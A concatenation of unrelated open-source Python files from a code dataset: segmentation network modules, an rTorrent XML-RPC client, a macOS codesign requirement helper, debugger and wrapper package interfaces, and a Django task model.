class PSPModule(nn.Module):
"""
Reference:
Zhao, Hengshuang, et al. *"Pyramid scene parsing network."*
"""
def __init__(self, features, out_features=512, sizes=(1, 2, 3, 6), norm_layer=BatchNorm2d):
super(PSPModule, self).__init__()
self.stages = []
self.stages = nn.ModuleList([self._make_stage(features, out_features, size, norm_layer) for size in sizes])
self.bottleneck = nn.Sequential(
nn.Conv2d(features+len(sizes)*out_features, out_features, kernel_size=1, padding=1, dilation=1, bias=False),
norm_layer(out_features),
nn.ReLU(),
nn.Dropout2d(0.1)
)
def _make_stage(self, features, out_features, size, norm_layer):
prior = nn.AdaptiveAvgPool2d(output_size=(size, size))
conv = nn.Conv2d(features, out_features, kernel_size=1, bias=False)
bn = norm_layer(out_features)
return nn.Sequential(prior, conv, bn)
def forward(self, feats):
h, w = feats.size(2), feats.size(3)
priors = [F.upsample(input=stage(feats), size=(h, w), mode='bilinear', align_corners=True) for stage in self.stages] + [feats]
bottle = self.bottleneck(torch.cat(priors, 1))
return bottle
# For BiSeNet
class AttentionRefinement(nn.Module):
def __init__(self, in_planes, out_planes,
norm_layer=nn.BatchNorm2d):
super(AttentionRefinement, self).__init__()
self.conv_3x3 = ConvBnRelu(in_planes, out_planes, 3, 1, 1,
has_bn=True, norm_layer=norm_layer,
has_relu=True, has_bias=False)
self.channel_attention = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
ConvBnRelu(out_planes, out_planes, 1, 1, 0,
has_bn=True, norm_layer=norm_layer,
has_relu=False, has_bias=False),
nn.Sigmoid()
)
def forward(self, x):
fm = self.conv_3x3(x)
fm_se = self.channel_attention(fm)
fm = fm * fm_se
return fm
# For BiSeNet
class FeatureFusion(nn.Module):
def __init__(self, in_planes, out_planes,
reduction=1, norm_layer=nn.BatchNorm2d):
super(FeatureFusion, self).__init__()
self.conv_1x1 = ConvBnRelu(in_planes, out_planes, 1, 1, 0,
has_bn=True, norm_layer=norm_layer,
has_relu=True, has_bias=False)
self.channel_attention = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
ConvBnRelu(out_planes, out_planes // reduction, 1, 1, 0,
has_bn=False, norm_layer=norm_layer,
has_relu=True, has_bias=False),
ConvBnRelu(out_planes // reduction, out_planes, 1, 1, 0,
has_bn=False, norm_layer=norm_layer,
has_relu=False, has_bias=False),
nn.Sigmoid()
)
def forward(self, x1, x2):
fm = torch.cat([x1, x2], dim=1)
fm = self.conv_1x1(fm)
fm_se = self.channel_attention(fm)
output = fm + fm * fm_se
return output
|
classification/tools.py
|
badheshchauhan/python
| 204 |
88658
|
<filename>classification/tools.py
from matplotlib.image import imread
import matplotlib.pyplot as plt
from math import sqrt
import math
import random
import numpy
import operator
from scipy.spatial.distance import cdist
from scipy.linalg import norm
import datetime
def Histogram(path):
image = imread(path)
if len(image.shape) != 2:
def gray(rgb): return numpy.dot(rgb[..., :3], [0.2989, 0.5870, 0.1140])
gray = gray(image)
image = gray
hist, bins = numpy.histogram(image.ravel(), 256, [0, 256])
return adapt(hist)
|
parlai/tasks/self_chat/agents.py
|
zl930216/ParlAI
| 9,228 |
88688
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Model self chat.
"""
from parlai.core.teachers import Teacher
class DefaultTeacher(Teacher):
def __init__(self, opt, shared=None):
raise RuntimeError(
'-t self_chat is a dummy helper, and not meant to be used directly.'
)
|
lib/rtorrent/__init__.py
|
Slashbunny/maraschino
| 137 |
88692
|
<filename>lib/rtorrent/__init__.py<gh_stars>100-1000
# Copyright (c) 2013 <NAME>, <<EMAIL>>
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import urllib
import os.path
import time
import xmlrpclib
from rtorrent.common import find_torrent, \
is_valid_port, convert_version_tuple_to_str
from rtorrent.lib.torrentparser import TorrentParser
from rtorrent.lib.xmlrpc.http import HTTPServerProxy
from rtorrent.lib.xmlrpc.scgi import SCGIServerProxy
from rtorrent.rpc import Method
from rtorrent.lib.xmlrpc.basic_auth import BasicAuthTransport
from rtorrent.torrent import Torrent
from rtorrent.group import Group
import rtorrent.rpc # @UnresolvedImport
__version__ = "0.2.9"
__author__ = "<NAME>"
__contact__ = "<EMAIL>"
__license__ = "MIT"
MIN_RTORRENT_VERSION = (0, 8, 1)
MIN_RTORRENT_VERSION_STR = convert_version_tuple_to_str(MIN_RTORRENT_VERSION)
class RTorrent:
""" Create a new rTorrent connection """
rpc_prefix = None
def __init__(self, uri, username=None, password=<PASSWORD>,
verify=False, sp=None, sp_kwargs=None):
self.uri = uri # : From X{__init__(self, url)}
self.username = username
self.password = password
self.schema = urllib.splittype(uri)[0]
if sp:
self.sp = sp
elif self.schema in ['http', 'https']:
self.sp = HTTPServerProxy
elif self.schema == 'scgi':
self.sp = SCGIServerProxy
else:
raise NotImplementedError()
self.sp_kwargs = sp_kwargs or {}
self.torrents = [] # : List of L{Torrent} instances
self._rpc_methods = [] # : List of rTorrent RPC methods
self._torrent_cache = []
self._client_version_tuple = ()
if verify is True:
self._verify_conn()
def _get_conn(self):
"""Get ServerProxy instance"""
if self.username is not None and self.password is not None:
if self.schema == 'scgi':
raise NotImplementedError()
return self.sp(
self.uri,
transport=BasicAuthTransport(self.username, self.password),
**self.sp_kwargs
)
return self.sp(self.uri, **self.sp_kwargs)
def _verify_conn(self):
# check for rpc methods that should be available
assert "system.client_version" in self._get_rpc_methods(), "Required RPC method not available."
assert "system.library_version" in self._get_rpc_methods(), "Required RPC method not available."
# minimum rTorrent version check
assert self._meets_version_requirement() is True,\
"Error: Minimum rTorrent version required is {0}".format(
MIN_RTORRENT_VERSION_STR)
def _meets_version_requirement(self):
return self._get_client_version_tuple() >= MIN_RTORRENT_VERSION
def _get_client_version_tuple(self):
conn = self._get_conn()
if not self._client_version_tuple:
if not hasattr(self, "client_version"):
setattr(self, "client_version",
conn.system.client_version())
rtver = getattr(self, "client_version")
self._client_version_tuple = tuple([int(i) for i in
rtver.split(".")])
return self._client_version_tuple
def _update_rpc_methods(self):
self._rpc_methods = self._get_conn().system.listMethods()
return self._rpc_methods
def _get_rpc_methods(self):
""" Get list of raw RPC commands
@return: raw RPC commands
@rtype: list
"""
return(self._rpc_methods or self._update_rpc_methods())
def get_torrents(self, view="main"):
"""Get list of all torrents in specified view
@return: list of L{Torrent} instances
@rtype: list
@todo: add validity check for specified view
"""
self.torrents = []
methods = rtorrent.torrent.methods
retriever_methods = [m for m in methods
if m.is_retriever() and m.is_available(self)]
m = rtorrent.rpc.Multicall(self)
m.add("d.multicall", view, "d.get_hash=",
*[method.rpc_call + "=" for method in retriever_methods])
results = m.call()[0] # only sent one call, only need first result
for result in results:
results_dict = {}
# build results_dict
for m, r in zip(retriever_methods, result[1:]): # result[0] is the info_hash
results_dict[m.varname] = rtorrent.rpc.process_result(m, r)
self.torrents.append(
Torrent(self, info_hash=result[0], **results_dict)
)
self._manage_torrent_cache()
return(self.torrents)
def _manage_torrent_cache(self):
"""Carry tracker/peer/file lists over to new torrent list"""
for torrent in self._torrent_cache:
new_torrent = rtorrent.common.find_torrent(torrent.info_hash,
self.torrents)
if new_torrent is not None:
new_torrent.files = torrent.files
new_torrent.peers = torrent.peers
new_torrent.trackers = torrent.trackers
self._torrent_cache = self.torrents
def _get_load_function(self, file_type, start, verbose):
"""Determine correct "load torrent" RPC method"""
func_name = None
if file_type == "url":
# url strings can be input directly
if start and verbose:
func_name = "load_start_verbose"
elif start:
func_name = "load_start"
elif verbose:
func_name = "load_verbose"
else:
func_name = "load"
elif file_type in ["file", "raw"]:
if start and verbose:
func_name = "load_raw_start_verbose"
elif start:
func_name = "load_raw_start"
elif verbose:
func_name = "load_raw_verbose"
else:
func_name = "load_raw"
return(func_name)
def load_torrent(self, torrent, start=False, verbose=False, verify_load=True):
"""
Loads torrent into rTorrent (with various enhancements)
@param torrent: can be a url, a path to a local file, or the raw data
of a torrent file
@type torrent: str
@param start: start torrent when loaded
@type start: bool
@param verbose: print error messages to rTorrent log
@type verbose: bool
@param verify_load: verify that torrent was added to rTorrent successfully
@type verify_load: bool
@return: Depends on verify_load:
- if verify_load is True, (and the torrent was
loaded successfully), it'll return a L{Torrent} instance
- if verify_load is False, it'll return None
@rtype: L{Torrent} instance or None
@raise AssertionError: If the torrent wasn't successfully added to rTorrent
- Check L{TorrentParser} for the AssertionError's
it raises
@note: Because this function includes url verification (if a url was input)
as well as verification as to whether the torrent was successfully added,
this function doesn't execute instantaneously. If that's what you're
looking for, use load_torrent_simple() instead.
"""
p = self._get_conn()
tp = TorrentParser(torrent)
torrent = xmlrpclib.Binary(tp._raw_torrent)
info_hash = tp.info_hash
func_name = self._get_load_function("raw", start, verbose)
# load torrent
getattr(p, func_name)(torrent)
if verify_load:
MAX_RETRIES = 3
i = 0
while i < MAX_RETRIES:
self.get_torrents()
if info_hash in [t.info_hash for t in self.torrents]:
break
# was still getting AssertionErrors, delay should help
time.sleep(1)
i += 1
assert info_hash in [t.info_hash for t in self.torrents],\
"Adding torrent was unsuccessful."
return(find_torrent(info_hash, self.torrents))
def load_torrent_simple(self, torrent, file_type,
start=False, verbose=False):
"""Loads torrent into rTorrent
@param torrent: can be a url, a path to a local file, or the raw data
of a torrent file
@type torrent: str
@param file_type: valid options: "url", "file", or "raw"
@type file_type: str
@param start: start torrent when loaded
@type start: bool
@param verbose: print error messages to rTorrent log
@type verbose: bool
@return: None
@raise AssertionError: if incorrect file_type is specified
@note: This function was written for speed, it includes no enhancements.
If you input a url, it won't check if it's valid. You also can't get
verification that the torrent was successfully added to rTorrent.
Use load_torrent() if you would like these features.
"""
p = self._get_conn()
assert file_type in ["raw", "file", "url"], \
"Invalid file_type, options are: 'url', 'file', 'raw'."
func_name = self._get_load_function(file_type, start, verbose)
if file_type == "file":
# since we have to assume we're connected to a remote rTorrent
# client, we have to read the file and send it to rT as raw
assert os.path.isfile(torrent), \
"Invalid path: \"{0}\"".format(torrent)
torrent = open(torrent, "rb").read()
if file_type in ["raw", "file"]:
finput = xmlrpclib.Binary(torrent)
elif file_type == "url":
finput = torrent
getattr(p, func_name)(finput)
def get_views(self):
p = self._get_conn()
return p.view_list()
def create_group(self, name, persistent=True, view=None):
p = self._get_conn()
if persistent is True:
p.group.insert_persistent_view('', name)
else:
assert view is not None, "view parameter required on non-persistent groups"
p.group.insert('', name, view)
self._update_rpc_methods()
def get_group(self, name):
assert name is not None, "group name required"
group = Group(self, name)
group.update()
return group
def set_dht_port(self, port):
"""Set DHT port
@param port: port
@type port: int
@raise AssertionError: if invalid port is given
"""
assert is_valid_port(port), "Valid port range is 0-65535"
self.dht_port = self._p.set_dht_port(port)
def enable_check_hash(self):
"""Alias for set_check_hash(True)"""
self.set_check_hash(True)
def disable_check_hash(self):
"""Alias for set_check_hash(False)"""
self.set_check_hash(False)
def find_torrent(self, info_hash):
"""Frontend for rtorrent.common.find_torrent"""
return(rtorrent.common.find_torrent(info_hash, self.get_torrents()))
def poll(self):
""" poll rTorrent to get latest torrent/peer/tracker/file information
@note: This essentially refreshes every aspect of the rTorrent
connection, so it can be very slow if working with a remote
connection that has a lot of torrents loaded.
@return: None
"""
self.update()
torrents = self.get_torrents()
for t in torrents:
t.poll()
def update(self):
"""Refresh rTorrent client info
@note: All fields are stored as attributes to self.
@return: None
"""
multicall = rtorrent.rpc.Multicall(self)
retriever_methods = [m for m in methods
if m.is_retriever() and m.is_available(self)]
for method in retriever_methods:
multicall.add(method)
multicall.call()
def _build_class_methods(class_obj):
# multicall add class
caller = lambda self, multicall, method, *args:\
multicall.add(method, self.rpc_id, *args)
caller.__doc__ = """Same as Multicall.add(), but with automatic inclusion
of the rpc_id
@param multicall: A L{Multicall} instance
@type: multicall: Multicall
@param method: L{Method} instance or raw rpc method
@type: Method or str
@param args: optional arguments to pass
"""
setattr(class_obj, "multicall_add", caller)
def __compare_rpc_methods(rt_new, rt_old):
from pprint import pprint
rt_new_methods = set(rt_new._get_rpc_methods())
rt_old_methods = set(rt_old._get_rpc_methods())
print("New Methods:")
pprint(rt_new_methods - rt_old_methods)
print("Methods not in new rTorrent:")
pprint(rt_old_methods - rt_new_methods)
def __check_supported_methods(rt):
from pprint import pprint
supported_methods = set([m.rpc_call for m in
methods +
rtorrent.file.methods +
rtorrent.torrent.methods +
rtorrent.tracker.methods +
rtorrent.peer.methods])
all_methods = set(rt._get_rpc_methods())
print("Methods NOT in supported methods")
pprint(all_methods - supported_methods)
print("Supported methods NOT in all methods")
pprint(supported_methods - all_methods)
methods = [
# RETRIEVERS
Method(RTorrent, 'get_xmlrpc_size_limit', 'get_xmlrpc_size_limit'),
Method(RTorrent, 'get_proxy_address', 'get_proxy_address'),
Method(RTorrent, 'get_split_suffix', 'get_split_suffix'),
Method(RTorrent, 'get_up_limit', 'get_upload_rate'),
Method(RTorrent, 'get_max_memory_usage', 'get_max_memory_usage'),
Method(RTorrent, 'get_max_open_files', 'get_max_open_files'),
Method(RTorrent, 'get_min_peers_seed', 'get_min_peers_seed'),
Method(RTorrent, 'get_use_udp_trackers', 'get_use_udp_trackers'),
Method(RTorrent, 'get_preload_min_size', 'get_preload_min_size'),
Method(RTorrent, 'get_max_uploads', 'get_max_uploads'),
Method(RTorrent, 'get_max_peers', 'get_max_peers'),
Method(RTorrent, 'get_timeout_sync', 'get_timeout_sync'),
Method(RTorrent, 'get_receive_buffer_size', 'get_receive_buffer_size'),
Method(RTorrent, 'get_split_file_size', 'get_split_file_size'),
Method(RTorrent, 'get_dht_throttle', 'get_dht_throttle'),
Method(RTorrent, 'get_max_peers_seed', 'get_max_peers_seed'),
Method(RTorrent, 'get_min_peers', 'get_min_peers'),
Method(RTorrent, 'get_tracker_numwant', 'get_tracker_numwant'),
Method(RTorrent, 'get_max_open_sockets', 'get_max_open_sockets'),
Method(RTorrent, 'get_session', 'get_session'),
Method(RTorrent, 'get_ip', 'get_ip'),
Method(RTorrent, 'get_scgi_dont_route', 'get_scgi_dont_route'),
Method(RTorrent, 'get_hash_read_ahead', 'get_hash_read_ahead'),
Method(RTorrent, 'get_http_cacert', 'get_http_cacert'),
Method(RTorrent, 'get_dht_port', 'get_dht_port'),
Method(RTorrent, 'get_handshake_log', 'get_handshake_log'),
Method(RTorrent, 'get_preload_type', 'get_preload_type'),
Method(RTorrent, 'get_max_open_http', 'get_max_open_http'),
Method(RTorrent, 'get_http_capath', 'get_http_capath'),
Method(RTorrent, 'get_max_downloads_global', 'get_max_downloads_global'),
Method(RTorrent, 'get_name', 'get_name'),
Method(RTorrent, 'get_session_on_completion', 'get_session_on_completion'),
Method(RTorrent, 'get_down_limit', 'get_download_rate'),
Method(RTorrent, 'get_down_total', 'get_down_total'),
Method(RTorrent, 'get_up_rate', 'get_up_rate'),
Method(RTorrent, 'get_hash_max_tries', 'get_hash_max_tries'),
Method(RTorrent, 'get_peer_exchange', 'get_peer_exchange'),
Method(RTorrent, 'get_down_rate', 'get_down_rate'),
Method(RTorrent, 'get_connection_seed', 'get_connection_seed'),
Method(RTorrent, 'get_http_proxy', 'get_http_proxy'),
Method(RTorrent, 'get_stats_preloaded', 'get_stats_preloaded'),
Method(RTorrent, 'get_timeout_safe_sync', 'get_timeout_safe_sync'),
Method(RTorrent, 'get_hash_interval', 'get_hash_interval'),
Method(RTorrent, 'get_port_random', 'get_port_random'),
Method(RTorrent, 'get_directory', 'get_directory'),
Method(RTorrent, 'get_port_open', 'get_port_open'),
Method(RTorrent, 'get_max_file_size', 'get_max_file_size'),
Method(RTorrent, 'get_stats_not_preloaded', 'get_stats_not_preloaded'),
Method(RTorrent, 'get_memory_usage', 'get_memory_usage'),
Method(RTorrent, 'get_connection_leech', 'get_connection_leech'),
Method(RTorrent, 'get_check_hash', 'get_check_hash',
boolean=True,
),
Method(RTorrent, 'get_session_lock', 'get_session_lock'),
Method(RTorrent, 'get_preload_required_rate', 'get_preload_required_rate'),
Method(RTorrent, 'get_max_uploads_global', 'get_max_uploads_global'),
Method(RTorrent, 'get_send_buffer_size', 'get_send_buffer_size'),
Method(RTorrent, 'get_port_range', 'get_port_range'),
Method(RTorrent, 'get_max_downloads_div', 'get_max_downloads_div'),
Method(RTorrent, 'get_max_uploads_div', 'get_max_uploads_div'),
Method(RTorrent, 'get_safe_sync', 'get_safe_sync'),
Method(RTorrent, 'get_bind', 'get_bind'),
Method(RTorrent, 'get_up_total', 'get_up_total'),
Method(RTorrent, 'get_client_version', 'system.client_version'),
Method(RTorrent, 'get_library_version', 'system.library_version'),
Method(RTorrent, 'get_api_version', 'system.api_version',
min_version=(0, 9, 1)
),
Method(RTorrent, "get_system_time", "system.time",
docstring="""Get the current time of the system rTorrent is running on
@return: time (posix)
@rtype: int""",
),
# MODIFIERS
Method(RTorrent, 'set_http_proxy', 'set_http_proxy'),
Method(RTorrent, 'set_max_memory_usage', 'set_max_memory_usage'),
Method(RTorrent, 'set_max_file_size', 'set_max_file_size'),
Method(RTorrent, 'set_bind', 'set_bind',
docstring="""Set address bind
@param arg: ip address
@type arg: str
""",
),
Method(RTorrent, 'set_up_limit', 'set_upload_rate',
docstring="""Set global upload limit (in bytes)
@param arg: speed limit
@type arg: int
""",
),
Method(RTorrent, 'set_port_random', 'set_port_random'),
Method(RTorrent, 'set_connection_leech', 'set_connection_leech'),
Method(RTorrent, 'set_tracker_numwant', 'set_tracker_numwant'),
Method(RTorrent, 'set_max_peers', 'set_max_peers'),
Method(RTorrent, 'set_min_peers', 'set_min_peers'),
Method(RTorrent, 'set_max_uploads_div', 'set_max_uploads_div'),
Method(RTorrent, 'set_max_open_files', 'set_max_open_files'),
Method(RTorrent, 'set_max_downloads_global', 'set_max_downloads_global'),
Method(RTorrent, 'set_session_lock', 'set_session_lock'),
Method(RTorrent, 'set_session', 'set_session'),
Method(RTorrent, 'set_split_suffix', 'set_split_suffix'),
Method(RTorrent, 'set_hash_interval', 'set_hash_interval'),
Method(RTorrent, 'set_handshake_log', 'set_handshake_log'),
Method(RTorrent, 'set_port_range', 'set_port_range'),
Method(RTorrent, 'set_min_peers_seed', 'set_min_peers_seed'),
Method(RTorrent, 'set_scgi_dont_route', 'set_scgi_dont_route'),
Method(RTorrent, 'set_preload_min_size', 'set_preload_min_size'),
Method(RTorrent, 'set_log.tracker', 'set_log.tracker'),
Method(RTorrent, 'set_max_uploads_global', 'set_max_uploads_global'),
Method(RTorrent, 'set_down_limit', 'set_download_rate',
docstring="""Set global download limit (in bytes)
@param arg: speed limit
@type arg: int
""",
),
Method(RTorrent, 'set_preload_required_rate', 'set_preload_required_rate'),
Method(RTorrent, 'set_hash_read_ahead', 'set_hash_read_ahead'),
Method(RTorrent, 'set_max_peers_seed', 'set_max_peers_seed'),
Method(RTorrent, 'set_max_uploads', 'set_max_uploads'),
Method(RTorrent, 'set_session_on_completion', 'set_session_on_completion'),
Method(RTorrent, 'set_max_open_http', 'set_max_open_http'),
Method(RTorrent, 'set_directory', 'set_directory'),
Method(RTorrent, 'set_http_cacert', 'set_http_cacert'),
Method(RTorrent, 'set_dht_throttle', 'set_dht_throttle'),
Method(RTorrent, 'set_hash_max_tries', 'set_hash_max_tries'),
Method(RTorrent, 'set_proxy_address', 'set_proxy_address'),
Method(RTorrent, 'set_split_file_size', 'set_split_file_size'),
Method(RTorrent, 'set_receive_buffer_size', 'set_receive_buffer_size'),
Method(RTorrent, 'set_use_udp_trackers', 'set_use_udp_trackers'),
Method(RTorrent, 'set_connection_seed', 'set_connection_seed'),
Method(RTorrent, 'set_xmlrpc_size_limit', 'set_xmlrpc_size_limit'),
Method(RTorrent, 'set_xmlrpc_dialect', 'set_xmlrpc_dialect'),
Method(RTorrent, 'set_safe_sync', 'set_safe_sync'),
Method(RTorrent, 'set_http_capath', 'set_http_capath'),
Method(RTorrent, 'set_send_buffer_size', 'set_send_buffer_size'),
Method(RTorrent, 'set_max_downloads_div', 'set_max_downloads_div'),
Method(RTorrent, 'set_name', 'set_name'),
Method(RTorrent, 'set_port_open', 'set_port_open'),
Method(RTorrent, 'set_timeout_sync', 'set_timeout_sync'),
Method(RTorrent, 'set_peer_exchange', 'set_peer_exchange'),
Method(RTorrent, 'set_ip', 'set_ip',
docstring="""Set IP
@param arg: ip address
@type arg: str
""",
),
Method(RTorrent, 'set_timeout_safe_sync', 'set_timeout_safe_sync'),
Method(RTorrent, 'set_preload_type', 'set_preload_type'),
Method(RTorrent, 'set_check_hash', 'set_check_hash',
docstring="""Enable/Disable hash checking on finished torrents
@param arg: True to enable, False to disable
@type arg: bool
""",
boolean=True,
),
]
_all_methods_list = [methods,
rtorrent.file.methods,
rtorrent.torrent.methods,
rtorrent.tracker.methods,
rtorrent.peer.methods,
]
class_methods_pair = {
RTorrent: methods,
rtorrent.file.File: rtorrent.file.methods,
rtorrent.torrent.Torrent: rtorrent.torrent.methods,
rtorrent.tracker.Tracker: rtorrent.tracker.methods,
rtorrent.peer.Peer: rtorrent.peer.methods,
}
for c in class_methods_pair.keys():
rtorrent.rpc._build_rpc_methods(c, class_methods_pair[c])
_build_class_methods(c)
|
src/tcclib/codesign.py
|
CollectiveDS/tccprofile
| 244 |
88699
|
<gh_stars>100-1000
"""Codesign."""
import re
import subprocess
from os import remove
from pathlib import Path, PurePath
from tempfile import gettempdir
def _xxd(blob):
"""XXD"""
result = None
# Note, this requires input passed in via 'stdin', so include 'stdin' for piping input.
_cmd = ['/usr/bin/xxd', '-r', '-p']
_p = subprocess.Popen(_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_p.stdin.write(blob)
_r, _e = _p.communicate()
if _p.returncode == 0 and _r:
result = _r
elif _p.returncode != 0 and _e:
result = _e
return result
def csreq(blob):
"""csreq"""
result = None
# Note, this requires input passed in via 'stdin', so include 'stdin' for piping input.
_cmd = ['/usr/bin/csreq', '-vvv', '-r', '-', '-t']
_p = subprocess.Popen(_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_p.stdin.write(_xxd(blob))
_r, _e = _p.communicate()
if _r and isinstance(_r, bytes):
_r = _r.decode('utf-8').strip()
if _e and isinstance(_e, bytes):
_e = _e.decode('utf-8').strip()
if _p.returncode == 0 and _r:
result = _r
elif _p.returncode != 0 and _e:
result = _e
return result
def detached_signature(path):
"""Codesign using a detached signature."""
result = None
_tmp = gettempdir()
_path_sig = '{}.sig'.format(PurePath(path).name)
_sig_file = Path(_tmp) / _path_sig
_cmd = ['/usr/bin/codesign', '--detached', str(_sig_file), '-s', '-', path]
_p = subprocess.Popen(_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_r, _e = _p.communicate()
if _r and isinstance(_r, bytes):
_r = _r.decode('utf-8')
if _e and isinstance(_e, bytes):
_e = _e.decode('utf-8')
if _p.returncode == 0:
result = requirements(path, detached_sig=_sig_file)
if result:
remove(str(_sig_file))
return result
def requirements(path, detached_sig=None, apple_event=False):
"""Codesign."""
result = dict()
# Change the dict keys if this is an AppleEvent style requirement
if apple_event:
_id_key = 'apple_events_identifier'
_id_type_key = 'apple_events_identifier_type'
_csreq_key = 'apple_events_csreq'
else:
_id_key = 'identifier'
_id_type_key = 'identifier_type'
_csreq_key = 'csreq'
# Lines with useful output start with these strings
_dsgn_prefix = 'designated => '
_idnt_prefix = 'Identifier='
# Bundle ID regex test string
_bnid_regex = re.compile(r'^\w+\.')
if not detached_sig:
_cmd = ['/usr/bin/codesign', '-v', '-dr', '-', path]
elif detached_sig:
_cmd = ['/usr/bin/codesign', '-vvv', '-d', '-r', '-', '--detached', detached_sig, path]
_p = subprocess.Popen(_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_r, _e = _p.communicate()
if _r and isinstance(_r, bytes):
_r = _r.decode('utf-8')
if _e and isinstance(_e, bytes):
_e = _e.decode('utf-8')
if _p.returncode == 0:
# Extract the code signature from the result. Handle circumstances
# where the output may not explicitly start with 'designated => '
# and where the code signature is split across multiple lines.
for _line in _r.splitlines():
if _dsgn_prefix in _line:
_res = _line.partition(_dsgn_prefix)
_res = _res[_res.index(_dsgn_prefix) + 1:][0]
result[_csreq_key] = _res
for _line in _e.splitlines():
if _line.startswith(_idnt_prefix):
if _idnt_prefix in _line:
result[_id_key] = _line.replace(_idnt_prefix, '')
result[_id_type_key] = 'bundleID'
# Test to make sure that the bundle ID matches
# expected style of 'org.example.foo'. This is
# not a terribly strict test, but it is aimed to
# avoid scenarios like the 'python3' binary
# deep in the framework has an identifier value
# of 'python3'.
if not re.match(_bnid_regex, result[_id_key]):
result[_id_key] = path
result[_id_type_key] = 'path'
elif _p.returncode == 1 and 'not signed' in _e:
result[_csreq_key] = None
result[_id_key] = None
result[_id_type_key] = None
result['is_signed'] = result.get('csreq', None) is not None
return result
|
tdb/interface.py
|
KEVINYZY/tdb
| 1,527 |
88704
|
"""
top-level interface methods so user doesn't need to directly construct
a dbsession
"""
import debug_session
# default session
_dbsession=None
def debug(evals,feed_dict=None,breakpoints=None,break_immediately=False,session=None):
"""
spawns a new debug session
"""
global _dbsession
_dbsession=debug_session.DebugSession(session)
return _dbsession.run(evals,feed_dict,breakpoints,break_immediately)
def s():
"""
step to the next node in the execution order
"""
global _dbsession
return _dbsession.s()
def c():
"""
continue
"""
global _dbsession
return _dbsession.c()
def get_exe_queue():
global _dbsession
return _dbsession.get_exe_queue()
def get_value(node):
global _dbsession
return _dbsession.get_value(node)
|
supersuit/__init__.py
|
PettingZoo-Team/SuperSu
| 237 |
88742
|
from .generic_wrappers import * # NOQA
from .lambda_wrappers import action_lambda_v1, observation_lambda_v0, reward_lambda_v0 # NOQA
from .multiagent_wrappers import agent_indicator_v0, black_death_v2, \
pad_action_space_v0, pad_observations_v0 # NOQA
from supersuit.generic_wrappers import frame_skip_v0, color_reduction_v0, resize_v0, dtype_v0, \
flatten_v0, reshape_v0, normalize_obs_v0, clip_actions_v0, clip_reward_v0, \
delay_observations_v0, frame_stack_v1, max_observation_v0, \
sticky_actions_v0 # NOQA
from .vector.vector_constructors import gym_vec_env_v0, stable_baselines_vec_env_v0, \
stable_baselines3_vec_env_v0, concat_vec_envs_v1, pettingzoo_env_to_vec_env_v1 # NOQA
from .aec_vector import vectorize_aec_env_v0 # NOQA
class DeprecatedWrapper(ImportError):
pass
def __getattr__(wrapper_name):
"""
Gives error that looks like this when trying to import old version of wrapper:
File "./supersuit/__init__.py", line 38, in __getattr__
raise DeprecatedWrapper(f"{base}{version_num} is now deprecated, use {base}{act_version_num} instead")
supersuit.DeprecatedWrapper: concat_vec_envs_v0 is now deprecated, use concat_vec_envs_v1 instead
"""
start_v = wrapper_name.rfind("_v") + 2
version = wrapper_name[start_v:]
base = wrapper_name[:start_v]
try:
version_num = int(version)
is_valid_version = True
except ValueError:
is_valid_version = False
globs = globals()
if is_valid_version:
for act_version_num in range(1000):
if f"{base}{act_version_num}" in globs:
if version_num < act_version_num:
raise DeprecatedWrapper(f"{base}{version_num} is now deprecated, use {base}{act_version_num} instead")
raise ImportError(f"cannot import name '{wrapper_name}' from 'supersuit'")
__version__ = "3.3.2"
|
galaxy/main/models/task.py
|
bmclaughlin/galaxy
| 904 |
88760
|
<reponame>bmclaughlin/galaxy<filename>galaxy/main/models/task.py
# (c) 2012-2019, Ansible by Red Hat
#
# This file is part of Ansible Galaxy
#
# Ansible Galaxy is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by
# the Apache Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Ansible Galaxy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License
# along with Galaxy. If not, see <http://www.apache.org/licenses/>.
import rq.job
from django.db import models
from django.contrib.postgres import fields as psql_fields
from pulpcore.app import models as pulp_models
class Task(models.Model):
"""
Generic table for handing tasks.
:var params: Task parameters json dictionary
:var result: Task result json dictionary
"""
params = psql_fields.JSONField(null=True)
result = psql_fields.JSONField(null=True)
pulp_task = models.OneToOneField(
pulp_models.Task, on_delete=models.CASCADE,
related_name='galaxy_task'
)
@property
def job_id(self):
return self.pulp_task.job_id
@property
def state(self):
return self.pulp_task.state
@property
def started_at(self):
return self.pulp_task.started_at
@property
def finished_at(self):
return self.pulp_task.finished_at
@property
def warnings(self):
return self.pulp_task.non_fatal_errors
@property
def error(self):
return self.pulp_task.error
@classmethod
def current(cls):
job = rq.job.get_current_job()
if job is None:
raise RuntimeError(
'This function is called outside of task context.'
)
return cls.objects.get(pulp_task__job_id=job.id)
|
tributary/__init__.py
|
Ferev/tributary
| 357 |
88765
|
<filename>tributary/__init__.py
from ._version import __version__ # noqa: F401, E402
from .lazy import LazyGraph, LazyNode, node # noqa: F401, E402
